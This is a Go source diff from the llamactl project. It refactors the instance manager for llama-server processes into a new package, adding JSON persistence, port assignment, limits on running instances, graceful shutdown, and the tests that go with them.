LlamaServerOptions: llamactl.LlamaServerOptions{
Host: "localhost",
Port: 8080,
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
// Get proxy for the first time
proxy1, err := instance.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 == nil {
t.Error("Expected proxy to be created")
}
// Get proxy again - should return cached version
proxy2, err := instance.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 != proxy2 {
t.Error("Expected cached proxy to be returned")
}
}
func TestMarshalJSON(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
data, err := json.Marshal(instance)
if err != nil {
t.Fatalf("JSON marshal failed: %v", err)
}
// Check that JSON contains expected fields
var result map[string]interface{}
err = json.Unmarshal(data, &result)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if result["name"] != "test-instance" {
t.Errorf("Expected name 'test-instance', got %v", result["name"])
}
if result["running"] != false {
t.Errorf("Expected running false, got %v", result["running"])
}
// Check that options are included
options_data, ok := result["options"]
if !ok {
t.Error("Expected options to be included in JSON")
}
options_map, ok := options_data.(map[string]interface{})
if !ok {
t.Error("Expected options to be a map")
}
if options_map["model"] != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %v", options_map["model"])
}
}
func TestUnmarshalJSON(t *testing.T) {
jsonData := `{
"name": "test-instance",
"running": true,
"options": {
"model": "/path/to/model.gguf",
"port": 8080,
"auto_restart": false,
"max_restarts": 5
}
}`
var instance llamactl.Instance
err := json.Unmarshal([]byte(jsonData), &instance)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if instance.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
}
if !instance.Running {
t.Error("Expected running to be true")
}
opts := instance.GetOptions()
if opts == nil {
t.Fatal("Expected options to be set")
}
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
}
if opts.Port != 8080 {
t.Errorf("Expected port 8080, got %d", opts.Port)
}
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 5 {
t.Errorf("Expected MaxRestarts to be 5, got %v", opts.MaxRestarts)
}
}
func TestUnmarshalJSON_PartialOptions(t *testing.T) {
jsonData := `{
"name": "test-instance",
"running": false,
"options": {
"model": "/path/to/model.gguf"
}
}`
var instance llamactl.Instance
err := json.Unmarshal([]byte(jsonData), &instance)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
opts := instance.GetOptions()
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
}
// Note: Defaults are NOT applied during unmarshaling
// They should only be applied by NewInstance or SetOptions
if opts.AutoRestart != nil {
t.Error("Expected AutoRestart to be nil (no defaults applied during unmarshal)")
}
}
func TestUnmarshalJSON_NoOptions(t *testing.T) {
jsonData := `{
"name": "test-instance",
"running": false
}`
var instance llamactl.Instance
err := json.Unmarshal([]byte(jsonData), &instance)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if instance.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
}
if instance.Running {
t.Error("Expected running to be false")
}
opts := instance.GetOptions()
if opts != nil {
t.Error("Expected options to be nil when not provided in JSON")
}
}
func TestCreateInstanceOptionsValidation(t *testing.T) {
tests := []struct {
name string
maxRestarts *int
restartDelay *int
expectedMax int
expectedDelay int
}{
{
name: "nil values",
maxRestarts: nil,
restartDelay: nil,
expectedMax: 0, // Should remain nil, but we can't easily test nil in this structure
expectedDelay: 0,
},
{
name: "valid positive values",
maxRestarts: intPtr(10),
restartDelay: intPtr(30),
expectedMax: 10,
expectedDelay: 30,
},
{
name: "zero values",
maxRestarts: intPtr(0),
restartDelay: intPtr(0),
expectedMax: 0,
expectedDelay: 0,
},
{
name: "negative values should be corrected",
maxRestarts: intPtr(-5),
restartDelay: intPtr(-10),
expectedMax: 0,
expectedDelay: 0,
},
}
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &llamactl.CreateInstanceOptions{
MaxRestarts: tt.maxRestarts,
RestartDelay: tt.restartDelay,
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := llamactl.NewInstance("test", globalSettings, options)
opts := instance.GetOptions()
if tt.maxRestarts != nil {
if opts.MaxRestarts == nil {
t.Error("Expected MaxRestarts to be set")
} else if *opts.MaxRestarts != tt.expectedMax {
t.Errorf("Expected MaxRestarts %d, got %d", tt.expectedMax, *opts.MaxRestarts)
}
}
if tt.restartDelay != nil {
if opts.RestartDelay == nil {
t.Error("Expected RestartDelay to be set")
} else if *opts.RestartDelay != tt.expectedDelay {
t.Errorf("Expected RestartDelay %d, got %d", tt.expectedDelay, *opts.RestartDelay)
}
}
})
}
}


@@ -1,249 +0,0 @@
package llamactl
import (
"fmt"
"sync"
)
// InstanceManager defines the interface for managing instances of the llama server.
type InstanceManager interface {
ListInstances() ([]*Instance, error)
CreateInstance(name string, options *CreateInstanceOptions) (*Instance, error)
GetInstance(name string) (*Instance, error)
UpdateInstance(name string, options *CreateInstanceOptions) (*Instance, error)
DeleteInstance(name string) error
StartInstance(name string) (*Instance, error)
StopInstance(name string) (*Instance, error)
RestartInstance(name string) (*Instance, error)
GetInstanceLogs(name string) (string, error)
}
type instanceManager struct {
mu sync.RWMutex
instances map[string]*Instance
ports map[int]bool
instancesConfig InstancesConfig
}
// NewInstanceManager creates a new instance of InstanceManager.
func NewInstanceManager(instancesConfig InstancesConfig) InstanceManager {
return &instanceManager{
instances: make(map[string]*Instance),
ports: make(map[int]bool),
instancesConfig: instancesConfig,
}
}
// ListInstances returns a list of all instances managed by the instance manager.
func (im *instanceManager) ListInstances() ([]*Instance, error) {
im.mu.RLock()
defer im.mu.RUnlock()
instances := make([]*Instance, 0, len(im.instances))
for _, instance := range im.instances {
instances = append(instances, instance)
}
return instances, nil
}
// CreateInstance creates a new instance with the given options and returns it.
// The instance is initially in a "stopped" state.
func (im *instanceManager) CreateInstance(name string, options *CreateInstanceOptions) (*Instance, error) {
if options == nil {
return nil, fmt.Errorf("instance options cannot be nil")
}
if len(im.instances) >= im.instancesConfig.MaxInstances && im.instancesConfig.MaxInstances != -1 {
return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
}
err := ValidateInstanceName(name)
if err != nil {
return nil, err
}
err = ValidateInstanceOptions(options)
if err != nil {
return nil, err
}
im.mu.Lock()
defer im.mu.Unlock()
// Check if instance with this name already exists
if im.instances[name] != nil {
return nil, fmt.Errorf("instance with name %s already exists", name)
}
// Assign a port if not specified
if options.Port == 0 {
port, err := im.getNextAvailablePort()
if err != nil {
return nil, fmt.Errorf("failed to get next available port: %w", err)
}
options.Port = port
} else {
// Validate the specified port
if _, exists := im.ports[options.Port]; exists {
return nil, fmt.Errorf("port %d is already in use", options.Port)
}
im.ports[options.Port] = true
}
instance := NewInstance(name, &im.instancesConfig, options)
im.instances[instance.Name] = instance
im.ports[options.Port] = true
return instance, nil
}
// GetInstance retrieves an instance by its name.
func (im *instanceManager) GetInstance(name string) (*Instance, error) {
im.mu.RLock()
defer im.mu.RUnlock()
instance, exists := im.instances[name]
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
return instance, nil
}
// UpdateInstance updates the options of an existing instance and returns it.
// If the instance is running, it will be restarted to apply the new options.
func (im *instanceManager) UpdateInstance(name string, options *CreateInstanceOptions) (*Instance, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if options == nil {
return nil, fmt.Errorf("instance options cannot be nil")
}
err := ValidateInstanceOptions(options)
if err != nil {
return nil, err
}
// Check if instance is running before updating options
wasRunning := instance.Running
// If the instance is running, stop it first
if wasRunning {
if err := instance.Stop(); err != nil {
return nil, fmt.Errorf("failed to stop instance %s for update: %w", name, err)
}
}
// Now update the options while the instance is stopped
instance.SetOptions(options)
// If it was running before, start it again with the new options
if wasRunning {
if err := instance.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s after update: %w", name, err)
}
}
return instance, nil
}
// DeleteInstance removes stopped instance by its name.
func (im *instanceManager) DeleteInstance(name string) error {
im.mu.Lock()
defer im.mu.Unlock()
_, exists := im.instances[name]
if !exists {
return fmt.Errorf("instance with name %s not found", name)
}
if im.instances[name].Running {
return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
}
delete(im.ports, im.instances[name].options.Port)
delete(im.instances, name)
return nil
}
// StartInstance starts a stopped instance and returns it.
// If the instance is already running, it returns an error.
func (im *instanceManager) StartInstance(name string) (*Instance, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if instance.Running {
return instance, fmt.Errorf("instance with name %s is already running", name)
}
if err := instance.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
}
return instance, nil
}
// StopInstance stops a running instance and returns it.
func (im *instanceManager) StopInstance(name string) (*Instance, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if !instance.Running {
return instance, fmt.Errorf("instance with name %s is already stopped", name)
}
if err := instance.Stop(); err != nil {
return nil, fmt.Errorf("failed to stop instance %s: %w", name, err)
}
return instance, nil
}
// RestartInstance stops and then starts an instance, returning the updated instance.
func (im *instanceManager) RestartInstance(name string) (*Instance, error) {
instance, err := im.StopInstance(name)
if err != nil {
return nil, err
}
return im.StartInstance(instance.Name)
}
// GetInstanceLogs retrieves the logs for a specific instance by its name.
func (im *instanceManager) GetInstanceLogs(name string) (string, error) {
im.mu.RLock()
_, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return "", fmt.Errorf("instance with name %s not found", name)
}
// TODO: Implement actual log retrieval logic
return fmt.Sprintf("Logs for instance %s", name), nil
}
func (im *instanceManager) getNextAvailablePort() (int, error) {
portRange := im.instancesConfig.PortRange
for port := portRange[0]; port <= portRange[1]; port++ {
if !im.ports[port] {
im.ports[port] = true
return port, nil
}
}
return 0, fmt.Errorf("no available ports in the specified range")
}

pkg/manager/manager.go Normal file

@@ -0,0 +1,296 @@
package manager
import (
"encoding/json"
"fmt"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"log"
"os"
"path/filepath"
"strings"
"sync"
"time"
)
// InstanceManager defines the interface for managing instances of the llama server.
type InstanceManager interface {
ListInstances() ([]*instance.Process, error)
CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
GetInstance(name string) (*instance.Process, error)
UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
DeleteInstance(name string) error
StartInstance(name string) (*instance.Process, error)
IsMaxRunningInstancesReached() bool
StopInstance(name string) (*instance.Process, error)
EvictLRUInstance() error
RestartInstance(name string) (*instance.Process, error)
GetInstanceLogs(name string) (string, error)
Shutdown()
}
type instanceManager struct {
mu sync.RWMutex
instances map[string]*instance.Process
runningInstances map[string]struct{}
ports map[int]bool
instancesConfig config.InstancesConfig
// Timeout checker
timeoutChecker *time.Ticker
shutdownChan chan struct{}
shutdownDone chan struct{}
isShutdown bool
}
// NewInstanceManager creates a new instance of InstanceManager.
func NewInstanceManager(instancesConfig config.InstancesConfig) InstanceManager {
if instancesConfig.TimeoutCheckInterval <= 0 {
instancesConfig.TimeoutCheckInterval = 5 // Default to 5 minutes if not set
}
im := &instanceManager{
instances: make(map[string]*instance.Process),
runningInstances: make(map[string]struct{}),
ports: make(map[int]bool),
instancesConfig: instancesConfig,
timeoutChecker: time.NewTicker(time.Duration(instancesConfig.TimeoutCheckInterval) * time.Minute),
shutdownChan: make(chan struct{}),
shutdownDone: make(chan struct{}),
}
// Load existing instances from disk
if err := im.loadInstances(); err != nil {
log.Printf("Error loading instances: %v", err)
}
// Start the timeout checker goroutine after initialization is complete
go func() {
defer close(im.shutdownDone)
for {
select {
case <-im.timeoutChecker.C:
im.checkAllTimeouts()
case <-im.shutdownChan:
return // Exit goroutine on shutdown
}
}
}()
return im
}
func (im *instanceManager) getNextAvailablePort() (int, error) {
portRange := im.instancesConfig.PortRange
for port := portRange[0]; port <= portRange[1]; port++ {
if !im.ports[port] {
im.ports[port] = true
return port, nil
}
}
return 0, fmt.Errorf("no available ports in the specified range")
}
// persistInstance saves an instance to its JSON file
func (im *instanceManager) persistInstance(instance *instance.Process) error {
if im.instancesConfig.InstancesDir == "" {
return nil // Persistence disabled
}
instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
tempPath := instancePath + ".tmp"
// Serialize instance to JSON
jsonData, err := json.MarshalIndent(instance, "", " ")
if err != nil {
return fmt.Errorf("failed to marshal instance %s: %w", instance.Name, err)
}
// Write to temporary file first
if err := os.WriteFile(tempPath, jsonData, 0644); err != nil {
return fmt.Errorf("failed to write temp file for instance %s: %w", instance.Name, err)
}
// Atomic rename
if err := os.Rename(tempPath, instancePath); err != nil {
os.Remove(tempPath) // Clean up temp file
return fmt.Errorf("failed to rename temp file for instance %s: %w", instance.Name, err)
}
return nil
}
func (im *instanceManager) Shutdown() {
im.mu.Lock()
// Check if already shutdown
if im.isShutdown {
im.mu.Unlock()
return
}
im.isShutdown = true
// Signal the timeout checker to stop
close(im.shutdownChan)
// Create a list of running instances to stop
var runningInstances []*instance.Process
var runningNames []string
for name, inst := range im.instances {
if inst.IsRunning() {
runningInstances = append(runningInstances, inst)
runningNames = append(runningNames, name)
}
}
// Release lock before stopping instances to avoid deadlock
im.mu.Unlock()
// Wait for the timeout checker goroutine to actually stop
<-im.shutdownDone
// Now stop the ticker
if im.timeoutChecker != nil {
im.timeoutChecker.Stop()
}
// Stop instances without holding the manager lock
var wg sync.WaitGroup
wg.Add(len(runningInstances))
for i, inst := range runningInstances {
go func(name string, inst *instance.Process) {
defer wg.Done()
fmt.Printf("Stopping instance %s...\n", name)
// Attempt to stop the instance gracefully
if err := inst.Stop(); err != nil {
fmt.Printf("Error stopping instance %s: %v\n", name, err)
}
}(runningNames[i], inst)
}
wg.Wait()
fmt.Println("All instances stopped.")
}
// loadInstances restores all instances from disk
func (im *instanceManager) loadInstances() error {
if im.instancesConfig.InstancesDir == "" {
return nil // Persistence disabled
}
// Check if instances directory exists
if _, err := os.Stat(im.instancesConfig.InstancesDir); os.IsNotExist(err) {
return nil // No instances directory, start fresh
}
// Read all JSON files from instances directory
files, err := os.ReadDir(im.instancesConfig.InstancesDir)
if err != nil {
return fmt.Errorf("failed to read instances directory: %w", err)
}
loadedCount := 0
for _, file := range files {
if file.IsDir() || !strings.HasSuffix(file.Name(), ".json") {
continue
}
instanceName := strings.TrimSuffix(file.Name(), ".json")
instancePath := filepath.Join(im.instancesConfig.InstancesDir, file.Name())
if err := im.loadInstance(instanceName, instancePath); err != nil {
log.Printf("Failed to load instance %s: %v", instanceName, err)
continue
}
loadedCount++
}
if loadedCount > 0 {
log.Printf("Loaded %d instances from persistence", loadedCount)
// Auto-start instances that have auto-restart enabled
go im.autoStartInstances()
}
return nil
}
// loadInstance loads a single instance from its JSON file
func (im *instanceManager) loadInstance(name, path string) error {
data, err := os.ReadFile(path)
if err != nil {
return fmt.Errorf("failed to read instance file: %w", err)
}
var persistedInstance instance.Process
if err := json.Unmarshal(data, &persistedInstance); err != nil {
return fmt.Errorf("failed to unmarshal instance: %w", err)
}
// Validate the instance name matches the filename
if persistedInstance.Name != name {
return fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, persistedInstance.Name)
}
statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
im.onStatusChange(persistedInstance.Name, oldStatus, newStatus)
}
// Create new inst using NewInstance (handles validation, defaults, setup)
inst := instance.NewInstance(name, &im.instancesConfig, persistedInstance.GetOptions(), statusCallback)
// Restore persisted fields that NewInstance doesn't set
inst.Created = persistedInstance.Created
inst.SetStatus(persistedInstance.Status)
// Check for port conflicts and add to maps
if inst.GetPort() > 0 {
port := inst.GetPort()
if im.ports[port] {
return fmt.Errorf("port conflict: instance %s wants port %d which is already in use", name, port)
}
im.ports[port] = true
}
im.instances[name] = inst
return nil
}
// autoStartInstances starts instances that were running when persisted and have auto-restart enabled
func (im *instanceManager) autoStartInstances() {
im.mu.RLock()
var instancesToStart []*instance.Process
for _, inst := range im.instances {
if inst.IsRunning() && // Was running when persisted
inst.GetOptions() != nil &&
inst.GetOptions().AutoRestart != nil &&
*inst.GetOptions().AutoRestart {
instancesToStart = append(instancesToStart, inst)
}
}
im.mu.RUnlock()
for _, inst := range instancesToStart {
log.Printf("Auto-starting instance %s", inst.Name)
// Reset running state before starting (since Start() expects stopped instance)
inst.SetStatus(instance.Stopped)
if err := inst.Start(); err != nil {
log.Printf("Failed to auto-start instance %s: %v", inst.Name, err)
}
}
}
func (im *instanceManager) onStatusChange(name string, oldStatus, newStatus instance.InstanceStatus) {
im.mu.Lock()
defer im.mu.Unlock()
if newStatus == instance.Running {
im.runningInstances[name] = struct{}{}
} else {
delete(im.runningInstances, name)
}
}
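
persistInstance above relies on the write-to-temp-then-rename pattern, so a crash mid-write can never leave a truncated JSON file behind. The same idea in isolation (a minimal sketch, not part of the project's API):

	func writeAtomic(path string, data []byte) error {
		tmp := path + ".tmp"
		if err := os.WriteFile(tmp, data, 0644); err != nil {
			return err
		}
		// Rename is atomic on POSIX filesystems: readers observe either
		// the old file or the complete new one, never a partial write.
		if err := os.Rename(tmp, path); err != nil {
			os.Remove(tmp) // clean up the temp file on failure
			return err
		}
		return nil
	}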

pkg/manager/manager_test.go Normal file

@@ -0,0 +1,186 @@
package manager_test
import (
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"os"
"path/filepath"
"strings"
"sync"
"testing"
)
func TestNewInstanceManager(t *testing.T) {
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogsDir: "/tmp/test",
MaxInstances: 5,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
TimeoutCheckInterval: 5,
}
mgr := manager.NewInstanceManager(cfg)
if mgr == nil {
t.Fatal("NewInstanceManager returned nil")
}
// Test initial state
instances, err := mgr.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 0 {
t.Errorf("Expected empty instance list, got %d instances", len(instances))
}
}
func TestPersistence(t *testing.T) {
tempDir := t.TempDir()
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: tempDir,
MaxInstances: 10,
TimeoutCheckInterval: 5,
}
// Test instance persistence on creation
manager1 := manager.NewInstanceManager(cfg)
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
_, err := manager1.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Check that JSON file was created
expectedPath := filepath.Join(tempDir, "test-instance.json")
if _, err := os.Stat(expectedPath); os.IsNotExist(err) {
t.Errorf("Expected persistence file %s to exist", expectedPath)
}
// Test loading instances from disk
manager2 := manager.NewInstanceManager(cfg)
instances, err := manager2.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Fatalf("Expected 1 loaded instance, got %d", len(instances))
}
if instances[0].Name != "test-instance" {
t.Errorf("Expected loaded instance name 'test-instance', got %q", instances[0].Name)
}
// Test port map populated from loaded instances (port conflict should be detected)
_, err = manager2.CreateInstance("new-instance", options) // Same port
if err == nil || !strings.Contains(err.Error(), "port") {
t.Errorf("Expected port conflict error, got: %v", err)
}
// Test file deletion on instance deletion
err = manager2.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
if _, err := os.Stat(expectedPath); !os.IsNotExist(err) {
t.Error("Expected persistence file to be deleted")
}
}
func TestConcurrentAccess(t *testing.T) {
mgr := createTestManager()
defer mgr.Shutdown()
// Test concurrent operations
var wg sync.WaitGroup
errChan := make(chan error, 10)
// Concurrent instance creation
for i := range 5 {
wg.Add(1)
go func(index int) {
defer wg.Done()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instanceName := fmt.Sprintf("concurrent-test-%d", index)
if _, err := mgr.CreateInstance(instanceName, options); err != nil {
errChan <- err
}
}(i)
}
// Concurrent list operations
for i := 0; i < 3; i++ {
wg.Add(1)
go func() {
defer wg.Done()
if _, err := mgr.ListInstances(); err != nil {
errChan <- err
}
}()
}
wg.Wait()
close(errChan)
// Check for any errors during concurrent access
for err := range errChan {
t.Errorf("Concurrent access error: %v", err)
}
}
func TestShutdown(t *testing.T) {
mgr := createTestManager()
// Create test instance
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := mgr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Shutdown should not panic
mgr.Shutdown()
// Multiple shutdowns should not panic
mgr.Shutdown()
}
// Helper function to create a test manager with standard config
func createTestManager() manager.InstanceManager {
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogsDir: "/tmp/test",
MaxInstances: 10,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
TimeoutCheckInterval: 5,
}
return manager.NewInstanceManager(cfg)
}

pkg/manager/operations.go Normal file

@@ -0,0 +1,300 @@
package manager
import (
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/instance"
"llamactl/pkg/validation"
"os"
"path/filepath"
)
type MaxRunningInstancesError error
// ListInstances returns a list of all instances managed by the instance manager.
func (im *instanceManager) ListInstances() ([]*instance.Process, error) {
im.mu.RLock()
defer im.mu.RUnlock()
instances := make([]*instance.Process, 0, len(im.instances))
for _, inst := range im.instances {
instances = append(instances, inst)
}
return instances, nil
}
// CreateInstance creates a new instance with the given options and returns it.
// The instance is initially in a "stopped" state.
func (im *instanceManager) CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
if options == nil {
return nil, fmt.Errorf("instance options cannot be nil")
}
name, err := validation.ValidateInstanceName(name)
if err != nil {
return nil, err
}
err = validation.ValidateInstanceOptions(options)
if err != nil {
return nil, err
}
im.mu.Lock()
defer im.mu.Unlock()
// Check max instances limit after acquiring the lock
if len(im.instances) >= im.instancesConfig.MaxInstances && im.instancesConfig.MaxInstances != -1 {
return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
}
// Check if instance with this name already exists
if im.instances[name] != nil {
return nil, fmt.Errorf("instance with name %s already exists", name)
}
// Assign and validate port for backend-specific options
if err := im.assignAndValidatePort(options); err != nil {
return nil, err
}
statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
im.onStatusChange(name, oldStatus, newStatus)
}
inst := instance.NewInstance(name, &im.instancesConfig, options, statusCallback)
im.instances[inst.Name] = inst
if err := im.persistInstance(inst); err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
}
return inst, nil
}
// GetInstance retrieves an instance by its name.
func (im *instanceManager) GetInstance(name string) (*instance.Process, error) {
im.mu.RLock()
defer im.mu.RUnlock()
instance, exists := im.instances[name]
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
return instance, nil
}
// UpdateInstance updates the options of an existing instance and returns it.
// If the instance is running, it will be restarted to apply the new options.
func (im *instanceManager) UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if options == nil {
return nil, fmt.Errorf("instance options cannot be nil")
}
err := validation.ValidateInstanceOptions(options)
if err != nil {
return nil, err
}
// Check if instance is running before updating options
wasRunning := instance.IsRunning()
// If the instance is running, stop it first
if wasRunning {
if err := instance.Stop(); err != nil {
return nil, fmt.Errorf("failed to stop instance %s for update: %w", name, err)
}
}
// Now update the options while the instance is stopped
instance.SetOptions(options)
// If it was running before, start it again with the new options
if wasRunning {
if err := instance.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s after update: %w", name, err)
}
}
im.mu.Lock()
defer im.mu.Unlock()
if err := im.persistInstance(instance); err != nil {
return nil, fmt.Errorf("failed to persist updated instance %s: %w", name, err)
}
return instance, nil
}
// DeleteInstance removes a stopped instance by name.
func (im *instanceManager) DeleteInstance(name string) error {
im.mu.Lock()
defer im.mu.Unlock()
inst, exists := im.instances[name]
if !exists {
return fmt.Errorf("instance with name %s not found", name)
}
if inst.IsRunning() {
return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
}
delete(im.ports, inst.GetPort())
delete(im.instances, name)
// Remove the instance's persisted config file, if one exists
instancePath := filepath.Join(im.instancesConfig.InstancesDir, inst.Name+".json")
if err := os.Remove(instancePath); err != nil && !os.IsNotExist(err) {
return fmt.Errorf("failed to delete config file for instance %s: %w", inst.Name, err)
}
return nil
}
// StartInstance starts a stopped instance and returns it.
// If the instance is already running, it returns an error.
func (im *instanceManager) StartInstance(name string) (*instance.Process, error) {
im.mu.RLock()
inst, exists := im.instances[name]
maxRunningReached := im.instancesConfig.MaxRunningInstances != -1 && len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if inst.IsRunning() {
return inst, fmt.Errorf("instance with name %s is already running", name)
}
if maxRunningReached {
return nil, MaxRunningInstancesError(fmt.Errorf("maximum number of running instances (%d) reached", im.instancesConfig.MaxRunningInstances))
}
if err := inst.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
}
im.mu.Lock()
defer im.mu.Unlock()
err := im.persistInstance(inst)
if err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
}
return inst, nil
}
func (im *instanceManager) IsMaxRunningInstancesReached() bool {
im.mu.RLock()
defer im.mu.RUnlock()
return im.instancesConfig.MaxRunningInstances != -1 && len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances
}
// StopInstance stops a running instance and returns it.
func (im *instanceManager) StopInstance(name string) (*instance.Process, error) {
im.mu.RLock()
inst, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if !inst.IsRunning() {
return inst, fmt.Errorf("instance with name %s is already stopped", name)
}
if err := inst.Stop(); err != nil {
return nil, fmt.Errorf("failed to stop instance %s: %w", name, err)
}
im.mu.Lock()
defer im.mu.Unlock()
err := im.persistInstance(inst)
if err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
}
return inst, nil
}
// RestartInstance stops and then starts an instance, returning the updated instance.
func (im *instanceManager) RestartInstance(name string) (*instance.Process, error) {
inst, err := im.StopInstance(name)
if err != nil {
return nil, err
}
return im.StartInstance(inst.Name)
}
// GetInstanceLogs retrieves the logs for a specific instance by its name.
func (im *instanceManager) GetInstanceLogs(name string) (string, error) {
im.mu.RLock()
_, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return "", fmt.Errorf("instance with name %s not found", name)
}
// TODO: Implement actual log retrieval logic
return fmt.Sprintf("Logs for instance %s", name), nil
}
// getPortFromOptions extracts the port from backend-specific options
func (im *instanceManager) getPortFromOptions(options *instance.CreateInstanceOptions) int {
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
if options.LlamaServerOptions != nil {
return options.LlamaServerOptions.Port
}
}
return 0
}
// setPortInOptions sets the port in backend-specific options
func (im *instanceManager) setPortInOptions(options *instance.CreateInstanceOptions, port int) {
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
if options.LlamaServerOptions != nil {
options.LlamaServerOptions.Port = port
}
}
}
// assignAndValidatePort assigns a port if not specified and validates it's not in use
func (im *instanceManager) assignAndValidatePort(options *instance.CreateInstanceOptions) error {
currentPort := im.getPortFromOptions(options)
if currentPort == 0 {
// Assign a port if not specified
port, err := im.getNextAvailablePort()
if err != nil {
return fmt.Errorf("failed to get next available port: %w", err)
}
im.setPortInOptions(options, port)
// Mark the port as used
im.ports[port] = true
} else {
// Validate the specified port
if _, exists := im.ports[currentPort]; exists {
return fmt.Errorf("port %d is already in use", currentPort)
}
// Mark the port as used
im.ports[currentPort] = true
}
return nil
}
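
getNextAvailablePort is not part of this hunk; a plausible sketch, assuming im.ports is the same map[int]bool used above and that PortRange is inclusive (the real implementation may differ):

// Hypothetical allocator consistent with assignAndValidatePort's usage.
func (im *instanceManager) getNextAvailablePort() (int, error) {
	for port := im.instancesConfig.PortRange[0]; port <= im.instancesConfig.PortRange[1]; port++ {
		if !im.ports[port] {
			return port, nil
		}
	}
	return 0, fmt.Errorf("no available ports in range %d-%d", im.instancesConfig.PortRange[0], im.instancesConfig.PortRange[1])
}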


